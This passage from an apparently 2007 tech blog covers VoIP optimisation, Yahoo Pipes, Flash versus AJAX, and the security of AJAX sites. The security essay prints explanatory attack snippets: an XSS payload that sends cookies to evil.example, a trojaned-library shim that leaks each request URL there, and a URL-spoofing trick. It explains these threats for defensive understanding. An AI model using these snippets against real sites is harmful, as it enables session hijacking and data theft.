Then people started complaining about soft-phones eating up every inch of their precious memory and network bandwidth. (Gee, so people really do care about memory, it seems.)
Then, a few months ago, I was talking to a friend who plans to revolutionize the IP-video market by doing things no one is concentrating on today.
"How?" I asked naively.
"We are writing optimized device drivers in assembly and C to ensure that we get the most out of CPU performance, reducing our client size by half to ensure better processing time (amongst other things)."

"But.. but.. Broadband! Visual programming!" I sputtered in rage.

Network speed and CPU power are no excuse to skip optimization. Burn those virtual calories.
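To put a number on the SigComp point above, here is a toy measurement: squeezing the example INVITE from RFC 3261 (lightly trimmed, no SDP body) with plain DEFLATE. This is zlib, not actual SigComp, but it shows why compressing a chatty text protocol pays off on narrow links.

    import zlib

    # The example INVITE from RFC 3261, lightly trimmed (no SDP body).
    invite = (
        "INVITE sip:bob@biloxi.com SIP/2.0\r\n"
        "Via: SIP/2.0/UDP pc33.atlanta.com;branch=z9hG4bK776asdhds\r\n"
        "Max-Forwards: 70\r\n"
        "To: Bob <sip:bob@biloxi.com>\r\n"
        "From: Alice <sip:alice@atlanta.com>;tag=1928301774\r\n"
        "Call-ID: a84b4c76e66710@pc33.atlanta.com\r\n"
        "CSeq: 314159 INVITE\r\n"
        "Contact: <sip:alice@pc33.atlanta.com>\r\n"
        "Content-Length: 0\r\n\r\n"
    ).encode()

    compressed = zlib.compress(invite, 9)
    print("raw:", len(invite), "bytes; deflated:", len(compressed), "bytes")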

Saturday, February 10, 2007

Just a reminder


Dear Readers,

just a couple of notes:

1. For all those who are subscribed to my feed via email, please ensure that you have verified your email address. When you subscribe via email, FeedBurner will send you an email to verify your address. If you have not received and acted upon that email, you will not get my feed delivered. I see a good number of people in the 'unverified' state, so please check your status. Also note that the 'feed by email' is sent out at 9AM each day, if there was a new post before that. So it is not instantaneous (I don't control it - FeedBurner works that way).

2. My feed should now be working properly, ordered the right way, thanks to the wonders of Yahoo Pipes - I simply created a pipe that sorts the Blogger feed by published date and used that as the feed into FeedBurner. What a great tool, this Yahoo Pipes. So for all those who were affected by the mess before, despair no more!

Friday, February 9, 2007

Piping Hot: Are VoIP bloggers really original?





Are VoIP/Convergence/Telecom/SIP bloggers really original or do they just keep picking up posts from each other?

Let's have some fun. I wrote up a Yahoo Pipe (What?? you don't know what they are??) that compares the feeds from:
It then filters them for VoIP/convergence related posts, selects only those that after analysis seem unique, sorts 'em and creates a new feed just for you.
Check it out here and see what happens when the above four blogs are put to the 'copycat' test :-)
I applaud the Yahoo team for coming out with such a great tool to let users turn diverse data into a personalized flow. Raw data becomes useful information only when you provide the right means to personalize it.
(Disclaimer: This post is just an excuse for me to test Yahoo Pipes - a very, very nice new concept in personalized aggregation. It is not really meant to discover whether we are all original or not, so don't complain if you think the algorithm for originality is rubbish!)
For a more serious example of how it helps, remember my earlier post where I was complaining that the new Blogger beta was sorting the feed by update date, not published date, and this resulted in old posts showing up for all my readers even if I fixed a typo? Yahoo Pipes solves it so simply - all I had to do was create a new pipe with a 'fetch' for my Blogger feed, sort it by published date, and export that feed to my FeedBurner input. Simple, huh?
Or take another, slightly more complicated example, where in addition to providing the site feed, I show how to add another feed attribute which shows who links to each post.
Note: Yahoo Pipes is very slow after launch. Yahoo says too many people are overloading it - they hope to get better in a few days, so if you see no output from my pipe, run it again!

Thursday, February 8, 2007

Web 2.0: The machine is us/(ing us)


A friend of mine passed on this great video at YouTube by Michael Wesch (Assistant Professor of Cultural Anthropology, Kansas State University). I also noticed that Alec Saunders has it on his page too, so it looks like this video is making the rounds.

I thought it was simply fantastic. A tip of the hat to Professor Wesch and his team. Enjoy. (Keep your speakers on.)

And then, once it excites you, how about diving into some details of Web 2.0 :-)

Wednesday, February 7, 2007

Flash vs. AJAX - Which to choose for Internet Based Communications?

There is no dearth of articles on the internet about the virtues of Flash over AJAX or the other way around. Arguments range from "proprietary plugin vs. open solution", "performance vs. bandwidth", "download size", "availability of skillset", "security" and much more. However, the focus of this topic is very specific: what is the right RIA platform/technology to use for 'Internet Based Communications' development?

In summary, if you want your product to be successful in the market in 2007-2010 and you need real-time voice, video and animation, Flash may be the better choice today. If you need to support mobile clients, stick with Flash. AJAX is great for semi-realtime solutions like IM chats, web-based desktop experiences, document collaboration etc. In fact, I blogged about its promise earlier. But it is not for voice/video/animation intensive operations.

Here are the details (PLEASE NOTE - all of this is in the context of building 'Communication Applications on the Internet').

First, let me define what I term 'Internet Based Communications' (IBC) and the primary components that need to be considered there.

My definition of IBC is 'a multi-dimensional mode of communication, where one or more users interact with each other and/or innovative services using a combination of, but not limited to, voice, video and multimedia messaging in a way that enhances their user experience for interaction' (no, I am not a lawyer - it is just so hard to get all the dimensions into one sentence).


Before we discuss the right RIA choice for IBC, let us first look at the primary components and their nature as far as 'load on network' is concerned (click image to see larger version). This 'bandwidth' understanding is useful for judging whether it is better to do something locally, using local CPU power, or remotely, having it 'sent to you' as 'frames'.




Within IBC, what are you making and what is your target market?

Deciding on a target market and what you plan to do is critical to deciding whether you should go the AJAX way or the Flash way. For example:

• Is your browser going to be your only client?
• Do you expect voice and video to be a part of your service?
• How important is security to your product, in a span of now to 5 years down?
• How important is 'animation' and 'interactivity' in your product?
• Is making your IBC product available on mobile phones important?
• What OSes do you need to support?
• Is 'plugin vs. no plugin', 'open vs. closed' a big deal for you?
And so forth…

Unless you have a good feel for the nature of your requirements as well as the 'load factor' of the components within your product (see table above), choosing between AJAX and Flash is like walking into a bullfight, blindfolded.

It is important to understand where Flash and AJAX overlap, and where they address completely different needs.

The best way to do the onion-ring comparison is to put it in 'context'. So why not answer the above questions?

Is your browser going to be your only client?

RIA is not only about your 'browser'! The Internet is not your browser either - it just so happens that a browser is an important tool in the overall environment. However, depending on what you are building, you may need a standalone client which has all the richness of mashable-ness, web services interfaces etc. but does not run in the context of your browser. The entire premise of AJAX is that your 'user experience' is responsive right within the context of your browser. Flash, on the other hand, has the concept of a 'standalone player' as well as a 'browser integrated plugin'. So before you choose one or the other, consider whether a 'browser as the only client' meets your business requirement. For example, using a browser, you cannot have a server directly contact your client unless the client first made an outgoing request to it (which is why, in the AJAX world, you may be aware of techniques such as polling, Comet and piggybacking to simulate such requirements). So if your application needs to go beyond a browser, AJAX may not be much of a choice.
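For the curious, plain polling (the simplest of the three techniques just mentioned) is little more than this loop; the /events endpoint and its JSON shape are hypothetical. Comet/long-polling refine the idea by holding the request open until the server actually has something to say.

    import json
    import time
    import urllib.request

    EVENTS_URL = "https://app.example.com/events?since="  # hypothetical

    def poll_forever(interval=5.0):
        last_seen = 0
        while True:
            # Ask the server for anything newer than what we have seen.
            with urllib.request.urlopen(EVENTS_URL + str(last_seen)) as resp:
                for event in json.load(resp):
                    last_seen = max(last_seen, event["id"])
                    print("server event:", event)
            time.sleep(interval)  # Comet would hold the request open instead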

Do you expect voice and video to be a part of your service?

I get confused when people tell me they want AJAX to do voice and video. Voice and video are CPU intensive operations - most VoIP solutions use at least some form of codec which needs to be decompressed in real time. In addition, if you add video to voice, there are further operations such as audio-video lip syncing and many others which add to CPU utilization. In other words, if you are using voice or video, you need local power - it cannot be 100% server based! For example, if you go to YouTube.com and watch a video, the video is being streamed to your local Flash plugin, an authorized plugin in the context of your browser, and that plugin is doing the heavy lifting of video decode. If you use Wengo Viso to auto-magically insert a video call widget in your website, you are using your local computing power for capturing your video and voice, encoding it and transmitting it to the remote side and vice versa - courtesy of your Flash plugin. So while you think 'there is no download', there actually is a 'download' - the Flash plugin that was packaged as part of your browser distribution!

Simply put, if you need voice or video, Flash beats AJAX hands-down. In fact, AJAX really does not play in this space, since it does not offer a voice or video solution - you pretty much need to craft the solution on your own, which could work, but would be rather onerous, and not as optimized as the Flash voice/video experience.

Also, you must have read about the much blogged about Flash-VoIP effort. I think it makes fabulous sense. If Adobe were to utilize its excellent distribution channels and bundle a SIP UA and standard voice and video codecs into the plugin, the entire browser world would automatically become voice and video enabled, and writing web widgets to activate that functionality becomes trivial. And like I said before, it effectively results in a 'no download' experience, because the download already happened one time before, as part of a 'platform update', and users had no idea of it. So you can walk into a web cafe, grab an available browser, and start voice/video chatting. Why would you need a local download of another 10MB voice chat application?

How important is security to your product, in a span of now to 5 years down?

It is commonly known today that JavaScript has several security issues that can be exploited by 'script kiddies'. This is of course a function of the maturity of AJAX vs. Flash. As I discussed in another article, this will change over time. But based on my assessment, it looks like Flash has a lead in security compared to AJAX, at least today, and I think for the next 2-3 years. When I searched for Flash exploits, most of them had to do with buffer overflows, and less with malformed-script parsing attacks.

So while Flash is ahead of AJAX here, you need to look into your crystal ball and see what you think your future holds for AJAX, and weigh security along with other needs. For example, if you are making a solution like online office productivity, expect the browser as the client, and don't think you are venturing into 'streaming intensive' applications, AJAX may be a safe choice too.

How important is 'animation' and 'interactivity' in your product?

If you are building a 'virtual community' or an 'interactive social networking site' which needs a lot of animation and fabulous transitions in real time, you will notice Flash to be almost predominant there, with new entrants also showing how AJAX powered interactive sites can be made, for example, Hive. But here is the catch: when you are building animation, you not only need to see the final product, but also need to ask the developers how simple it is to build such a solution. In addition, you need to keep a keen eye on the amount of 'internet bandwidth' you are consuming with this animation. The problem with AJAX is that while it has the benefit of 'truly no plugin required', it also means that whatever is needed must be sent from the server to the client. If you run a network traffic monitor on graphics intensive solutions using AJAX, you will notice a significant amount of backend downloading going on, supplying image frames as well as a large quantity of controlling logic code (JS, primarily) from the server to your browser. Solutions such as integrating SVG (Scalable Vector Graphics) into AJAX are premature and exist today only as proof that it can be done.

If you have developed in Flash, you will notice that ActionScript is only a small part of the overall solution. Flash offers a fabulous graphical animation studio, with easy to understand concepts of timelines, layers, frames and such, which make animation really very simple. And the fact that you can control them all using ActionScript makes it a wonderful platform for creating interactive applications. The other thing is, when it comes to effective animation, I truly feel a plugin is a good thing. The server based model cannot beat local graphics-crunching, and the optimized Flash plugin, written in native code, does a great job of rendering locally, within the frame of your browser if needed. And to boot, my personal experience has been that the file size, if written appropriately, is really very small.

For example, I spent last week reading about Flash programming and then wrote a tiny 'superman' side-scroller game. It is buggy, but that is due to my own lack of time to make it robust - I just wanted to see how it worked, how simple it was, and how optimized it was. This Flash game is a measly 9KB in size.

Here goes:






Or consider this fabulous new feature from Flash 8 that not only allows you to capture webcam detail but also lets you process it within your ActionScript, making 'motion detection' a reality using just a webcam. Apply this to an IBC application of a virtual chatroom. You are equipped with a webcam, get into the virtual room, and bring your hand forward in front of the PC as a 'handshake' gesture. This is captured by your webcam and sent to the ActionScript in the SWF, which applies an appropriate algorithm to detect pixel changes between frames and evaluates this to be a handshake gesture; your virtual online character automatically extends his hand to shake with the other virtual characters. And no, you are not using the Nintendo Wii. Just a webcam. Admittedly, detecting motion vs. understanding motion are two different problem spaces, but Flash has the tools to make this happen. Like I said, when it comes to interactivity of this nature, Flash is simply fabulous.
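For clarity, here is the same frame-differencing trick sketched outside Flash: a minimal Python/numpy version, assuming you already have two consecutive grayscale webcam frames as 2-D uint8 arrays. The thresholds are arbitrary illustration values.

    import numpy as np

    def motion_detected(prev_frame, cur_frame,
                        pixel_threshold=30, changed_fraction=0.02):
        # Widen to int16 so the subtraction cannot wrap around at 0/255.
        diff = np.abs(cur_frame.astype(np.int16) - prev_frame.astype(np.int16))
        # Motion = enough pixels changed by a noticeable amount.
        return (diff > pixel_threshold).mean() > changed_fraction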
One may want to keep a tab on interesting efforts such as OpenLaszlo's Digital Life and similar. The technology is still very beta, and one would need to see how it scales to large content-intensive applications over time. I have personally not used OpenLaszlo, but I've talked to ISVs who have, and the feedback I got is that it is still very limited and has a long road ahead.

Is making your IBC product available on mobile phones important?

Here is the fact: AJAX-capable browsers for mobile phones are almost non-existent today. It doesn't matter what a Google search tells you about the 'impending arrival of AJAX for mobiles'. I've talked to countless mobile phone ISVs and the story is exactly the same:
a) We don't believe the browser is the only client
b) Most browsers for mobile phones are 'limited' today. Support for AJAX within these 'limited' browsers is doubly limited!

AJAX is on the radar, but Flash Lite is the reality there.
What OSes do you need to support?
Theoretically, AJAX implementations should work on every OS with a browser that supports all the required JS/DHTML/CSS features. Reality depends on how good current browser support is on those OSes and on their plans for full compliance. On the desktop/server side, the predominant OSes are Windows, MacOS, Linux and maybe SunOS/Solaris (though not for much longer, I think). On the terminal side, the main players are Symbian, Windows Mobile, BREW and some new penetration of real-time Linux variants. Flash and/or Flash Lite is available for all of the above, and the AJAX prerequisites should also be available on all the server OSes listed. But if you need support for esoteric or less-used OSes, there is no telling when Flash will be available for them (nor whether full AJAX support will be, but since AJAX is based on open specifications, an enthusiast could craft an AJAX engine (!) for them). So as far as ‘guaranteed platform support, and if not, let me write it myself’ goes, AJAX wins. But if your business lives on the mainline supported OSes, Flash is fine too. Also note that competition is always healthy. Adobe recognizes the emergence of AJAX in certain niche applications which could otherwise have been served by Flash (like collaborative documentation, etc.), which is why they have made small entries such as the Flex-AJAX bridge to ensure users have options to work them together, though this is currently limited. So rest assured that a market leader can get as aggressive as needed to keep its lead in the market. Adobe is no different.

Is ‘plugin vs. no plugin’, ‘open vs. closed’ a big deal for you?

To be frank, I am often puzzled by this. Flash has a fabulous distribution channel: almost every browser in the world has the Flash plugin and accepts signed updates from Macromedia for Flash player updates. Real-time voice, video and animation need local computing power, so what other solution is there that is deployable en masse, other than local clients (or plugins)? In fact, I think Flash has a great advantage here. Since the plugin is already a part of the browser, its ‘downloaded size’ doesn’t count.

It reminds me of the Firefox vs. IE argument. FF folks would always argue that the reason FF seems more sluggish than IE is that Windows pre-loads parts of the IE engine as part of its OS initialization, so when the user clicks the IE icon, only the remaining part needs loading – unlike FF, which loads the whole shebang unless you use a pre-loader. Technically, I get it. From a user-experience standpoint, I don’t think they get it. To a user, it does not matter that IE gets pre-loaded as part of OS init; all he knows is that it resulted in a faster load time.

The same holds true for Flash vs. AJAX: the plugin download just doesn’t count. If Flash does a better job at local rendering of voice/video and animation, then for AJAX solutions to play in this market, they need to compete by offering better performance, not more excuses. In addition, to do anything really useful in AJAX, you need more than just bare-bones AJAX: you need to download and use one of the many ‘AJAX toolkits’. Depending on what they do, their size ranges from a few KB to a few megabytes. So instead of downloading the Flash player, you are effectively downloading an ‘AJAX library’ (the innumerable .js script links in many AJAX pages). Alternately, the AJAX library you used for programming generates gobs (hundreds and hundreds of lines) of JS/DHTML code which your browser then downloads.

Finally, the ‘open vs. closed’ thing. Why is having source code so important? Yes, it is always better to control your destiny – I get that. But in this case, you need to see whether the APIs exposed by Flash are limiting you or not; if not, then you shouldn’t be complaining. ‘Open source’ may also be important to you for cost purposes. While Adobe distributes the Flash and Flash Lite players free, they charge for Macromedia Flash 8, Flash Cast and other development solutions. Remember that AJAX has freeware and commercial-ware too. It is all a function of functionality vs. price, and you are the best judge of that.

      Saturday, January 27, 2007

Why Artificial Intelligence if you can have Peer-Peer Intelligence?




It is interesting to note how competitive the search world is getting. The eternal quest for ‘finding the right answer’ is leading this technically advanced generation back to the basics – why not utilize the intelligence of the actual human brain that we are all trying to simulate?

Solutions like the recently discontinued Google Answers and the currently blossoming Yahoo Answers are examples where you can ask targeted questions of ‘experts’, who provide you with educated answers. In this model, however, the ‘experts’ are usually more qualified than the average Joe. The real power of involving humans comes when you can expand in scale and make it attractive for contributors in terms of personal profit – in other words, a model that can utilize the ‘spare time’ of millions of people to offer collective intelligence. Another example of this is LinkedIn’s recently launched Questions tab. For those who don’t know, LinkedIn is a business networking tool that allows you to connect to several industry professionals; I use it a lot as well. Now that LinkedIn has a great network of friends, friends of friends and so on, it makes sense to traverse this network to get targeted information. So they launched LinkedIn Answers, where a person can ask a question and anyone in the network can answer it. Questions range from “What is the one killer-app you would like in your cell phone?” to “How can we make the law more user friendly?”. The answers come from your network, which may include engineers, VPs, CTOs and CEOs of companies, whom you get to tap for information. The answers are detailed, and often fabulous. I bet you couldn’t get the same quality from a plain Google search.

Similarly, Google went the human route for Image Search. While you can apply complex word algorithms to textual articles, how do you provide relevant image searches? How do you know a particular image represents a search query like “long tail theory”? Simple: tap into real humans with the Google Image Labeler. Make it a game, get information in return. Beats the heck out of AI engines.

And then, yesterday, I used ChaCha, the guided search engine. The logic here is again simple: utilize the free time of millions of peers and have them search for you. They have a huge network of guides, and one guide can invite another. When you launch a ChaCha search and choose the guided option, a real user responds and chats with you to refine the search. I spent the day talking to several of them – they are real people, who get paid for the hours they log into ChaCha. Depending on which ‘level’ they are graded at (a function of user feedback on their search reports, among other factors), they can earn anything between $5 and $10 an hour. I talked to one guide, a mother of three, who says she loves this ‘part-time job’: when she needs some extra cash, she logs in, helps people and earns money. When guides get ‘promoted’ to a higher grade, their pay can double, she says. I asked if they are trained, and was told they do go through some level of keyword-search training. Personally, I did not find their level of expertise to be any better than the average user’s (I think I can search far better with advanced search parameters); I tested them with queries for which I already knew the answer and timed how long they took to find it. The challenge for ChaCha, I think, will be to train their people so that more users see a benefit in using the guides. Still, it is an interesting model – I am sure there are many who would find it useful. It also seems that their payout is heavily based on how I rate their help, so not a single one tried to hurry me; in fact, we even chatted about general things while the guide searched. I wonder, then, if ChaCha-like systems could effectively merge search-as-a-service into a larger social networking tool! See their blog for other ways to increase your payout using this service.

All in all, it is very interesting to see how the human collective is being utilized to further personalize the world of search. While one may have thought that ‘simulated intelligence’ would eventually take jobs away from people, I guess the Internet is balancing this well by reaching out to people and offering them new ways to ‘mesh into this new world intelligence’ and supplement their living. In fact, I was at Internet Telephony last week, where I spoke on the ‘Effect of Web 2.0 on the Telco World’, and in one of the keynotes Rich mentioned that this particular event was full of military people, because they wanted to learn how VoIP technology can help those disabled in war earn a living!
      Vive-la-Internet.

      Wednesday, January 17, 2007

      Reader Warning: Messed up Feed


Feb 09 Update: I found a way to fix Blogger's feed sort order. Instead of providing my Atom feed to FeedBurner directly, I created a Yahoo Pipe to sort my feed and gave the pipe's RSS output to FeedBurner. So hopefully, after I make this change, you should not see this post jump to the top of the feed. If you do, I have work to do!
Update: Looks like the new Blogger will continue to re-order posts based on update date. Yeesh and !@$!XX!@* again. Read more here.

Folks, sorry, but it looks like the feed for my website has been completely messed up ever since I upgraded to Blogger Beta. I use FeedBurner, which in turn takes its feed from the Blogger feed at http://corporaterat.blogspot.com/atom.xml . If you look at that Atom feed, you will notice my posts are all topsy-turvy: posts are missing, and old posts show up front. Of course, I should have researched before I upgraded, but it is too late now – I am at the mercy of Google to fix the feed.

The positive side: as part of the Blogger upgrade, I now have labels (see sidebar), so you can browse posts by category.

      Not sure what I can do about it except yell and scream. So please don't forget to visit this site every once in a while to see what's new.

Web 2.0 and AJAX - fundamentally insecure?



In the past couple of days, I’ve been delving into the supposed security issues that the new Web 2.0 and AJAX-enabled sites introduce, and also looking into claims I heard that for serious applications one should stick to Flash, since it is inherently more secure, tried and tested than AJAX is today.

To investigate the inherent and publicized security issues within AJAX, we first need to understand the underlying technologies AJAX uses. Specifically, AJAX comprises:

a) XMLHttpRequest (XHR) – a relatively new API, now added to most well-known browsers, that allows asynchronous communication between the browser and the web server

b) Client-side JavaScript – around for a long time, an implementation of the ECMAScript specification, used as the programming language for many web-based applications
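For reference, this is roughly what a minimal XHR round trip looks like (a sketch; the /echo endpoint and the result element are made up for illustration):

    // Create the XHR object (older IE exposes it via ActiveX instead)
    var xhr = window.XMLHttpRequest ? new XMLHttpRequest()
                                    : new ActiveXObject("Microsoft.XMLHTTP");

    // Asynchronous GET to the page's own origin
    xhr.open("GET", "/echo?q=hello", true);
    xhr.onreadystatechange = function () {
      if (xhr.readyState == 4 && xhr.status == 200) {
        // Update part of the page without a full reload
        document.getElementById("result").innerHTML = xhr.responseText;
      }
    };
    xhr.send(null);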

To properly assess AJAX-related security issues, then, it makes sense to take a look at what sort of security issues these two critical underlying technologies present.

XSS – Cross-Site Scripting attacks – a JavaScript and URL-handling exploit

The concept here is straightforward. XSS is not a technology – it refers to a technique where a malicious user constructs an ‘evil’ input which, when passed to a trusted but vulnerable site, causes that site to compromise its users. Consider, for example, a site called www.goodsite.com, which accepts a search query like so: www.goodsite.com/q=mysearch. Now let us assume that goodsite.com does not do a good job of validating the input provided. One could construct a URI like www.goodsite.com/q=(insert malicious script code here) and send it off to goodsite. If goodsite lets this pass, the script is, in effect, executed in the context of the user's browser session. So if I were to send you this URI and you clicked it, I could, for example, hijack your session cookie at goodsite and have it sent to me via embedded JavaScript (JavaScript allows cross-domain HTTP requests). If you think this is trivially avoidable, you'd be surprised at how many ways there are to bypass web server checks. For example, take a look at the MySpace exploit that used dynamic HTML and fragmented text blocks to hide substrings that would otherwise have been caught by the web server's parser.
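To make this concrete, here is a minimal sketch of such an attack (goodsite.com is from the example above; evil.example and its steal endpoint are placeholders). The crafted link the attacker circulates might look like:

    http://www.goodsite.com/q=<script>new Image().src="http://evil.example/steal?c="+document.cookie;</script>

If goodsite echoes the query back into the page unescaped, the victim's browser executes the injected script with goodsite's cookies in scope:

    // Runs in the context of goodsite.com, inside the victim's session.
    // An image fetch is a classic exfiltration channel, because image
    // requests (unlike XHR) are not restricted to the page's own domain.
    new Image().src = "http://evil.example/steal?c=" +
                      encodeURIComponent(document.cookie);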

Ideally, one could argue that XSS should be disallowed, or that all web servers MUST ensure all special characters are made ‘safe’ (encoded using HTML entities) so that they are only displayed, never interpreted, on the remote side. However, with the increasing popularity of responsive web sites using AJAX-related technologies, mash-ups are becoming very common, and the ability for one domain to pass on data for remote script execution helps in managing load on the local host. XSS-related vulnerabilities have been around for a long time and have successfully infected a variety of web-based solutions, including PHP boards, Google, Apache, Mozilla, MySpace, Yahoo and many more.
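For what it's worth, the entity encoding mentioned above is short to write; a sketch (the function and variable names are mine):

    // Encode the characters that let user input break out of HTML context.
    function escapeHtml(s) {
      return String(s)
        .replace(/&/g, "&amp;")
        .replace(/</g, "&lt;")
        .replace(/>/g, "&gt;")
        .replace(/"/g, "&quot;")
        .replace(/'/g, "&#39;");
    }

    // The query is now displayed verbatim, never interpreted as markup.
    resultDiv.innerHTML = "You searched for: " + escapeHtml(userQuery);

The hard part, as the MySpace exploit showed, is applying it consistently at every point where untrusted input meets markup.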

      It is important to note that XSS depends on the following:

a) You somehow pass a ‘malicious’ URI to a user and get him to click on it (it doesn’t make sense to trigger the XSS vulnerability in your own browser context, unless you think you can launch a remote exploit via a buffer underflow or overflow – but that is a different attack, not categorized under XSS; more on this later)

b) It assumes that the web server receiving this input does not do a good job of validating it


      Effect of Web 2.0 on XSS attacks

Does Web 2.0 impact the risks of XSS attacks? Yes and no. Technically speaking, XSS has nothing to do with Web 2.0 and AJAX: it is a vulnerability that existed well before AJAX was even coined as a term, and XSS attacks started surfacing almost as soon as JavaScript was introduced. However, with the proliferation of Web 2.0 sites there is a significant increase in collaboration, mash-ups and multi-tenancy, which all mean the same thing – there is a larger audience that can now be targeted. So the ‘no’ is a technical response; the ‘yes’ is a market response, due to adoption. That is not to say that ‘Web 2.0 results in increased XSS vulnerabilities’. The right statement would be ‘Web 2.0 results in more people using potentially vulnerable technologies, which, unless hardened, present a wider possibility of financial and reputation damage’ (heck, sounds like a lawyer crafted that, but you get what I mean). In addition, multi-tenancy (different applications on a single cluster of hosts) means the exposed vulnerability of one application can compromise others, unless the multi-tenant host takes very special care of intra-trust-domains (providers usually do a good job on inter-trust-domains, but lag on trust within their own domain, which is why once you get in, you can usually do a lot of damage on peripheral nodes).


XMLHttpRequest (XHR) & JavaScript Repudiation Attacks

This really is a derivative attack on an already compromised site (it is interesting to note that most of these attacks rely on implementation gaps in web servers). Assuming you manage to get malicious script code in, you can use XHR to automatically issue any number of HTTP commands – ‘agree to some terms of service’, ‘buy item’, and so on – as long as they don't require user input not already known to the environment. The exact same thing is possible with plain JavaScript, so this is not really specific to AJAX (the only new thing AJAX brought in was XHR; JavaScript existed well before that). Since the web server does not know whether a request came from an embedded XHR call or an explicit user click, it cannot differentiate between the two.
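A sketch of the problem (the store endpoint is hypothetical): once malicious script is running in the victim's session, its requests are indistinguishable from the user's own clicks.

    // Injected script, running in the victim's authenticated session.
    // The server sees an ordinary request carrying the victim's cookies
    // and cannot tell it apart from a genuine 'Buy' click.
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "/store/buy?item=42&agree=yes", true);
    xhr.send(null);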


      Effect of Web 2.0 on Repudiation Attacks

Once again, with the hype and slickness of XHR+JS applications proliferating around the web, more people should concentrate on architecture and data protection instead of focusing only on ‘how to make the interface slicker’. So again, Web 2.0 does not technically make the situation worse, but in the surge to ship prettier applications, developers need to go back to basics on implementing a secure environment for distributed systems and on input validation.

      (AJAX) Bridging

Bridging is a software concept that long pre-dates Web 2.0. In effect, it is the process of installing a ‘gateway server’ between multiple content sources. This gateway server maintains a trusted relationship with the backend content servers and is therefore also capable of hosting the integration logic that ‘meshes’ these diverse contents together. This sort of bridging has increased in popularity with the deployment of mash-up applications, and it introduces another twist to XHR attacks. XHR cannot access HTTP pages outside the domain being served: for example, if a script is running at www.google.com, XHR can't make an HTTP request to www.yahoo.com. However, if the application is hosted on a bridge server, one could use the bridge server's URI to reach content on a backend site (for example, if the bridge server knowingly or unknowingly supports URI redirection). Do note that JavaScript supports this capability as well, so XHR is not strictly required; now that browsers support XHR, similar exploits are possible through it too. What happens then is that, by transitive relationship, if Yahoo were to offer its APIs to a trusted site, the users of that trusted site could now target attacks on Yahoo using common tricks like SQL injection, DoS (repeated bulk HTTP requests via XHR) and similar.
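A sketch of the transitive trust problem (the /fetch redirection parameter on the bridge is invented for illustration):

    // Blocked by the same-origin policy: a page served from the bridge's
    // domain cannot make an XHR request directly to www.yahoo.com.
    var xhr = new XMLHttpRequest();
    // xhr.open("GET", "http://www.yahoo.com/api/data", true); // security error

    // Allowed: the request targets the bridge (same origin as the page),
    // and the bridge, trusted by the backend, forwards it on.
    xhr.open("GET", "/fetch?target=http://www.yahoo.com/api/data", true);
    xhr.send(null);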

      Effect of Web 2.0 on XHR Bridging Attacks

Web-based mash-up applications are proliferating today, and the use of bridge servers to blend content from multiple sites is becoming much more commonplace (for instance, mashing Google Maps with craigslist, house searches and more). As in any architecture, the fundamental principle that ‘a chain is only as strong as its weakest link’ applies equally here.

JavaScript ‘Script Kiddie’ Tricks

This is a compendium of tricks that have plagued immature implementations of JavaScript. Many of them are very irritating and can destroy the user experience. Pascal Meunier, for example, maintains a list of some of these irritants, which work even today on the most recent browsers. They include:
a) Dynamically generating a fake page for a valid URI – a simple JavaScript trick where, if you visit http://bad.com and click on a link there for ‘google.com’, your browser URL can change to google.com while displaying some other crafted page (it works in IE7; FF 2.0 smartly displays the URL redirection). A rough sketch follows this list.
b) Nasty JS code that traps browser events and does not let you navigate away from the page unless you close the browser

      And more.
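Here is a rough sketch of how trick (a) could be pulled off (an illustration of the idea only; exact behavior varies by browser, and patched browsers block it):

    <!-- The href looks legitimate; the onclick hijacks the navigation. -->
    <a href="http://www.google.com"
       onclick="var w = window.open('http://www.google.com');
                // Write into the window while the real page is still loading;
                // a vulnerable browser keeps showing google.com in the
                // address bar while rendering the attacker's content.
                w.document.write('<h1>Crafted page</h1>');
                return false;">google.com</a>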

Of course, JS being a programming language, it can also be used for more serious purposes – like port-scanning your own network and potentially reporting the results to an external site.

Effect of Web 2.0 on JS Vulnerabilities

Most of the Web 2.0 world relies heavily on JavaScript. In fact, I can point you to hundreds of sites that blindly download ‘JS+XHR (AJAX) toolkits’ like prototype.js and start using their functions. Just as an example, prototype.js is a 64KB file densely packed with XHR and JS code. How many people actually look into that file? What stops me from hosting a malicious prototype.js, having people pull that file into their own context, and shipping their context-sensitive information out? With the increasing use of JS on commercial sites in the quest for a better user experience, the inherent implementation gaps of JS interpreters in browsers can do much more damage, simply because JS is now used in many more mainstream functions than before.
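To illustrate the worry, here is a sketch of what a trojaned copy of such a toolkit could do (hypothetical code; this is not anything in the real prototype.js, and evil.example is a placeholder):

    // A malicious toolkit can shim the browser's XHR constructor so that
    // every request the page makes is silently copied to a third party.
    var RealXHR = window.XMLHttpRequest;
    window.XMLHttpRequest = function () {
      var xhr = new RealXHR();
      var realOpen = xhr.open;
      xhr.open = function (method, url, async) {
        // Leak each request URL (which may carry tokens or form data).
        new Image().src = "http://evil.example/log?u=" + encodeURIComponent(url);
        return realOpen.apply(xhr, arguments);
      };
      return xhr;
    };

The page using the library keeps working exactly as before, which is what makes this class of problem so hard to spot.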

      XHR+JS insecurities vs. Flash

Comparing this to Flash: when I googled around for vulnerabilities, most of the ones I came across had to do with buffer exploits. Simply put, buffer exploits are a set of techniques where a malicious user finds a piece of executable code that does not check input length and feeds it a string large enough to overflow the stack space allocated for it. The string is crafted with machine opcodes at just the right place, so that the function's return address is overwritten with an address inside the string itself – which contains an encoded instruction sequence. Effectively, the remote user has managed to execute code on the target platform, thereby launching an internal attack. Such attacks are very old and still prevalent. A great tutorial (old, but gold) on buffer exploits can be read here.

So while I found such buffer exploits, I did not have much success finding ActionScript-related exploits similar in nature to those described above. I did find references in random forum posts saying that a few years ago Flash's ActionScript was in a similar stage, but it seems the implementation has improved over the years. Again, this was a cursory look – I'd be happy to be pointed to similar exploits in the Flash world.

Buffer exploits will always remain, and finding and exploiting them does not require an open programming-language interface like JS. But these exploits take more skill to probe and compromise (yes, I am aware of automated buffer-exploit scanners, but applying them to different environments requires more skill) and remain an art practiced by a smaller niche community.

However, in the entire Flash vs. AJAX security debate, I do have another concern. JS and XHR exploits need to be fixed by the ‘browser’ owners – Microsoft, Mozilla, Apple and others – while Flash exploits need to be fixed by Adobe, and can be fixed independently of the browser, since Flash is a third-party plugin while JS and XHR are core browser implementations. I wonder whether relying on browser companies to fix issues takes longer than relying on Adobe to fix a plugin issue. As Web 2.0 with AJAX continues to go mainstream, only time will tell.

      Conclusion

What we observe, then, is that most of the vulnerabilities of AJAX have little to do with AJAX itself and more to do with the inherent weaknesses of immature implementations and bad architectural choices by developers. Most of the vulnerabilities above boil down to:

      a) User Input is not validated well
      b) Data Integrity and logical firewalling is not thought out well
c) Current implementations of JavaScript in browsers are rather dismal
